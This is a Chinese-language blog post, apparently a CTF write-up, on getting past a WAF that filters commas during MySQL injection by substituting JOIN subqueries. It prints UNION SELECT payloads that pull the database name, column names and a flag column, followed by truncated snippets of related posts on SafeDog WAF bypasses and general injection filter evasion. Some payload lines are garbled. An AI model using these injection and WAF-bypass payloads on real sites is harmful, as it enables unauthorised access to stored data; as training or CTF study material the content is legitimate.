逗號攔截繞過

2022-08-29 14:06:20 字數 1881 閱讀 5219

今天做了一道i春秋上面的題,一些東西可以記錄一下。

檢視原始碼按原始碼提示輸入login.php?id=1

burp抓包後也沒什麼有價值的資訊。看了別人的wp發現,需要對第乙個頁面抓包,然後可以找到乙個302重定向。簡單理解就是在我們進入題目的那一刻有乙個頁面跳轉。

真實的url是l0gin.php?id=1.

跟進這個檔案

按套路首先測一下資料庫中被過濾的字元。

發現當輸入id=1' and ascii(substr((select database()),1,1))>64 %23

逗號被waf掉了。

學習了一下無逗號注入

記錄一下

如果不存在逗號的問題,正常的套路應該是

?id=-1' union select 1,2#

?id=-1' union select database(),2#

?id=-1' union select table_name from information.schema.tables where  table_schema where table_schema=database() #

join代替逗號:

一,-1' union select * from (select database()) a join (select 2) b %23

資料庫名sqli

二,查資料表

三,-1 ' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join ( select 2 ) b %23

四,-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select 2) b %23

如何繞過chrome的彈窗攔截機制

在chrome的安全機制裡面,非使用者觸發的window.open方法,是會被攔截的。舉個例子 var btn btn btn.click function 上面的 中,window.open是使用者觸發的時候,是不會被攔截的,可以正常開啟新視窗。再看下面這個 var btn btn btn.cli...

安全狗最新版V3 3繞過攔截注入漏洞

最新版安全狗的攔截過濾存在問題,導致可以繞過攔截進行注入 對於select from 的攔截可在 select 前後或中間插入 81 ff,即可繞過攔截注入如 id 1 20union 20sel 81ect 201,2 20from 20admin id 1 20union 20select 81...

mysql 注釋 繞過 sql注入繞過方法

一 注釋符號繞過 在sql中常用的注釋符號有 二 大小寫繞過 當web正則過濾的時候對大小寫不敏感的情況下使用,一般很少會有這種漏洞 比如當過濾了select的時候我們可以採用select來查詢 三 內聯注釋繞過 把要使用的查詢語句放在 中,這樣在一般的資料庫是不會執行的,但是在mysql中內聯注釋...